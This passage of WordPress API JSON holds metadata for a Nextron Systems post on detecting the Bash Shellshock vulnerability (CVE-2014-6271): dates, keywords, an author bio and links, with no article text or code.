erkennen","datePublished":"2014-09-26T09:50:31+00:00","dateModified":"2022-10-04T13:54:15+00:00","mainEntityOfPage":{"@id":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/"},"wordCount":991,"publisher":{"@id":"https:\/\/www.nextron-systems.com\/#organization"},"keywords":["bash","CVE-2014-6271","erkennen","patch","Schutz","Schwachstelle","Shell Shock","shellshock"],"articleSection":["Alert","Tutorial"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/","url":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/","name":"Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen","isPartOf":{"@id":"https:\/\/www.nextron-systems.com\/#website"},"datePublished":"2014-09-26T09:50:31+00:00","dateModified":"2022-10-04T13:54:15+00:00","description":"Informationen wie Sie die Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/"]}]},{"@type":"WebSite","@id":"https:\/\/www.nextron-systems.com\/#website","url":"https:\/\/www.nextron-systems.com\/","name":"Nextron Systems","description":"We Detect Hackers","publisher":{"@id":"https:\/\/www.nextron-systems.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.nextron-systems.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.nextron-systems.com\/#organization","name":"Nextron Systems GmbH","url":"https:\/\/www.nextron-systems.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png","contentUrl":"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png","width":260,"height":260,"caption":"Nextron Systems GmbH"},"image":{"@id":"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919","name":"Florian Roth","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g","caption":"Florian Roth"},"description":"Florian Roth serves as the Head of Research and Development at Nextron Systems. With a background in IT security since 2000, he has delved deep into nation-state cyber attacks since 2012. Florian has developed the THOR Scanner and actively engages with the community via his Twitter handle @cyb3rops. He has contributed to open-source projects, including 'Sigma', a generic SIEM rule format, and 'LOKI', an open-source scanner. Additionally, he has shared valuable resources like a mapping of APT groups and operations and an Antivirus Event Analysis Cheat Sheet.","url":"https:\/\/www.nextron-systems.com\/author\/florian\/"}]}},"_links":{"self":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/comments?post=985"}],"version-history":[{"count":4,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/985\/revisions"}],"predecessor-version":[{"id":14662,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/985\/revisions\/14662"}],"wp:attachment":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/media?parent=985"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/categories?post=985"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/tags?post=985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}